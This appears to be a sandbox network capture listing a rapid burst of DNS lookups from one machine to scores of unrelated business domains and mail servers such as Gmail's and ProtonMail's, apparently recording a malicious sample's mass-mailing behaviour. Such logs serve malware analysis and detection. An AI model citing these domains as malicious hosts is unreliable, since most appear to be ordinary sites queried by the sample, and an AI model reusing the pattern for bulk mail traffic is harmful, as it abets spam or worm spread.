                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.328646898 CET192.168.2.68.8.8.80x4f7cStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.343166113 CET192.168.2.68.8.8.80xece5Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.359119892 CET192.168.2.68.8.8.80x63deStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.386472940 CET192.168.2.68.8.8.80x7cc4Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.390676022 CET192.168.2.68.8.8.80x383aStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.401094913 CET192.168.2.68.8.8.80x815bStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.413588047 CET192.168.2.68.8.8.80xe802Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.467258930 CET192.168.2.68.8.8.80x85e3Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.538599014 CET192.168.2.68.8.8.80x7bc5Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.539222956 CET192.168.2.68.8.8.80x52b5Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.539432049 CET192.168.2.68.8.8.80x855fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.545006990 CET192.168.2.68.8.8.80x5da5Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.561089039 CET192.168.2.68.8.8.80x20a4Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.562789917 CET192.168.2.68.8.8.80xff0fStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.601144075 CET192.168.2.68.8.8.80x6dd0Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.646728992 CET192.168.2.68.8.8.80x16e3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.654318094 CET192.168.2.68.8.8.80xed63Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.671746969 CET192.168.2.68.8.8.80x7d89Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.672394991 CET192.168.2.68.8.8.80x3f55Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.676220894 CET192.168.2.68.8.8.80xe9afStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.684295893 CET192.168.2.68.8.8.80xffd4Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.698710918 CET192.168.2.68.8.8.80xcb7fStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.701144934 CET192.168.2.68.8.8.80x158fStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.701442957 CET192.168.2.68.8.8.80xd0e9Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.703491926 CET192.168.2.68.8.8.80x6b34Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.710921049 CET192.168.2.68.8.8.80x721aStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.732079983 CET192.168.2.68.8.8.80x8b8Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.740482092 CET192.168.2.68.8.8.80x9cc9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.745008945 CET192.168.2.68.8.8.80xca16Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.812047005 CET192.168.2.68.8.8.80x53abStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.856781960 CET192.168.2.68.8.8.80x14f6Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.878895044 CET192.168.2.68.8.8.80xcbf1Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.884635925 CET192.168.2.68.8.8.80xa77dStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.898026943 CET192.168.2.68.8.8.80xebf2Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.903959036 CET192.168.2.68.8.8.80x9ecdStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.917546988 CET192.168.2.68.8.8.80x7d40Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.917885065 CET192.168.2.68.8.8.80x54e7Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.022075891 CET192.168.2.68.8.8.80xafb7Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.063941956 CET192.168.2.68.8.8.80x5705Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.076503992 CET192.168.2.68.8.8.80xb76fStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.117458105 CET192.168.2.68.8.8.80x2858Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.117820024 CET192.168.2.68.8.8.80xf8c8Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.119931936 CET192.168.2.68.8.8.80xf30cStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.169425011 CET192.168.2.68.8.8.80x4e6cStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.179856062 CET192.168.2.68.8.8.80x7bb8Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.190639019 CET192.168.2.68.8.8.80xa3cbStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.205528021 CET192.168.2.68.8.8.80x42ddStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.215553045 CET192.168.2.68.8.8.80x378eStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.245785952 CET192.168.2.68.8.8.80x9fe2Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.344228029 CET192.168.2.68.8.8.80xe6d0Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.350596905 CET192.168.2.68.8.8.80x266Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.430468082 CET192.168.2.68.8.8.80x47ddStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.432852030 CET192.168.2.68.8.8.80x7ea3Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.434170961 CET192.168.2.68.8.8.80x5947Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.440576077 CET192.168.2.68.8.8.80x5f26Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.454386950 CET192.168.2.68.8.8.80x2226Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.493331909 CET192.168.2.68.8.8.80xdaaStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.493977070 CET192.168.2.68.8.8.80x6771Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.494529009 CET192.168.2.68.8.8.80xf065Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.495112896 CET192.168.2.68.8.8.80xa6cStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.514426947 CET192.168.2.68.8.8.80xff7bStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.521585941 CET192.168.2.68.8.8.80x6b92Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.524261951 CET192.168.2.68.8.8.80x598bStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.538495064 CET192.168.2.68.8.8.80x9f9fStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.540594101 CET192.168.2.68.8.8.80xf93dStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.565516949 CET192.168.2.68.8.8.80xeee6Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.588881016 CET192.168.2.68.8.8.80x56dfStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.591308117 CET192.168.2.68.8.8.80xac21Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.591655016 CET192.168.2.68.8.8.80x2358Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.602962017 CET192.168.2.68.8.8.80x145Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.629915953 CET192.168.2.68.8.8.80xb742Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.634330988 CET192.168.2.68.8.8.80x91Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.669966936 CET192.168.2.68.8.8.80x8c95Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.673604965 CET192.168.2.68.8.8.80xdbc0Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.709522963 CET192.168.2.68.8.8.80xffd4Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.715239048 CET192.168.2.68.8.8.80x6a8Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.745002985 CET192.168.2.68.8.8.80xb74bStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.789437056 CET192.168.2.68.8.8.80x6c37Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.793201923 CET192.168.2.68.8.8.80x58a8Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.814353943 CET192.168.2.68.8.8.80xd92cStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.816453934 CET192.168.2.68.8.8.80xf074Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.826139927 CET192.168.2.68.8.8.80x1c33Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.843980074 CET192.168.2.68.8.8.80x8aceStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.898134947 CET192.168.2.68.8.8.80x3fcdStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.920108080 CET192.168.2.68.8.8.80x9454Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.924371004 CET192.168.2.68.8.8.80xc1a4Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.947452068 CET192.168.2.68.8.8.80xfa0fStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.966440916 CET192.168.2.68.8.8.80xad83Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.996160030 CET192.168.2.68.8.8.80x30eStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.014791965 CET192.168.2.68.8.8.80x9493Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.040266991 CET192.168.2.68.8.8.80xd649Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.055465937 CET192.168.2.68.8.8.80xcf14Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.077178955 CET192.168.2.68.8.8.80xafb7Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.150161028 CET192.168.2.68.8.8.80x934fStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.337399006 CET192.168.2.68.8.8.80xa7dcStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.351155996 CET192.168.2.68.8.8.80xeeb3Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.397772074 CET192.168.2.68.8.8.80x68e2Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.413501978 CET192.168.2.68.8.8.80x8d20Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.421819925 CET192.168.2.68.8.8.80xa13eStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.439903021 CET192.168.2.68.8.8.80x8e34Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.471957922 CET192.168.2.68.8.8.80x7394Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.494781017 CET192.168.2.68.8.8.80x1ed4Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.521939039 CET192.168.2.68.8.8.80x155eStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.537789106 CET192.168.2.68.8.8.80x8ea4Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.541040897 CET192.168.2.68.8.8.80x27c8Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.549365997 CET192.168.2.68.8.8.80xf9c3Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.554367065 CET192.168.2.68.8.8.80x35e5Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.603125095 CET192.168.2.68.8.8.80xb528Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.609002113 CET192.168.2.68.8.8.80x855fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.650875092 CET192.168.2.68.8.8.80x3f31Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.660593987 CET192.168.2.68.8.8.80xbc54Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.665004969 CET192.168.2.68.8.8.80xd205Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.753150940 CET192.168.2.68.8.8.80x4a66Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.779256105 CET192.168.2.68.8.8.80x66ebStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.976447105 CET192.168.2.68.8.8.80xeb30Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.002247095 CET192.168.2.68.8.8.80x4ca9Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.009929895 CET192.168.2.68.8.8.80x8621Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.070616961 CET192.168.2.68.8.8.80xa2bfStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.549983978 CET192.168.2.68.8.8.80xea2bStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.593482018 CET192.168.2.68.8.8.80xd16cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.650798082 CET192.168.2.68.8.8.80xa46aStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.664102077 CET192.168.2.68.8.8.80xd795Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.675314903 CET192.168.2.68.8.8.80xe1dfStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.759732008 CET192.168.2.68.8.8.80x999bStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.768661022 CET192.168.2.68.8.8.80xc655Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.798454046 CET192.168.2.68.8.8.80x316eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.932604074 CET192.168.2.68.8.8.80xde2bStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.939603090 CET192.168.2.68.8.8.80x69c5Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.013019085 CET192.168.2.68.8.8.80x8974Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.015788078 CET192.168.2.6198.32.64.120x77Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.073283911 CET192.168.2.68.8.8.80x2afStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.142957926 CET192.168.2.68.8.8.80x687fStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.161283970 CET192.168.2.68.8.8.80x6e28Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.161284924 CET192.168.2.68.8.8.80x3478Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.162456036 CET192.168.2.68.8.8.80x2e7aStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.165134907 CET192.168.2.68.8.8.80xcacfStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.171681881 CET192.168.2.68.8.8.80x3b45Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.172808886 CET192.168.2.68.8.8.80xafb7Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.194096088 CET192.168.2.68.8.8.80xe72dStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.227675915 CET192.168.2.68.8.8.80x4580Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.234087944 CET192.168.2.68.8.8.80x316eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.239623070 CET192.168.2.68.8.8.80x541dStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.253484011 CET192.168.2.68.8.8.80x2150Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.257224083 CET192.168.2.68.8.8.80xd25bStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.290133953 CET192.168.2.68.8.8.80x96cdStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.293188095 CET192.168.2.68.8.8.80x2bc0Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.294167042 CET192.168.2.68.8.8.80x58b8Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.402004957 CET192.168.2.68.8.8.80xfa4eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.465270996 CET192.168.2.68.8.8.80xe463Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.537903070 CET192.168.2.68.8.8.80x17fcStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.540251017 CET192.168.2.68.8.8.80x83d7Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.548491001 CET192.168.2.68.8.8.80x10cbStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.550889969 CET192.168.2.68.8.8.80x405eStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.551202059 CET192.168.2.68.8.8.80xf31cStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.555099010 CET192.168.2.68.8.8.80xb93dStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.559554100 CET192.168.2.68.8.8.80x780aStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.567490101 CET192.168.2.68.8.8.80xdfa1Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.571888924 CET192.168.2.68.8.8.80xd1d1Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.580240011 CET192.168.2.68.8.8.80x1ee7Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.585480928 CET192.168.2.68.8.8.80x1ea6Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.593359947 CET192.168.2.68.8.8.80x6122Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.597408056 CET192.168.2.68.8.8.80x1c67Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.607891083 CET192.168.2.68.8.8.80xeef8Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.629261017 CET192.168.2.68.8.8.80x4242Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.651350021 CET192.168.2.68.8.8.80x7e9cStandard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.679830074 CET192.168.2.68.8.8.80x699dStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.914788961 CET192.168.2.68.8.8.80xf96Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.946260929 CET192.168.2.68.8.8.80xe6dbStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.038105965 CET192.168.2.68.8.8.80x74aeStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.102340937 CET192.168.2.68.8.8.80x8b5fStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.149183035 CET192.168.2.68.8.8.80x2aeStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.156250954 CET192.168.2.68.8.8.80xcf27Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.229376078 CET192.168.2.68.8.8.80x541dStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.249927044 CET192.168.2.68.8.8.80x316eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.278209925 CET192.168.2.68.8.8.80xc30eStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.325695038 CET192.168.2.68.8.8.80x199cStandard query (0)unicus.jpA (IP address)IN (0x0001)false
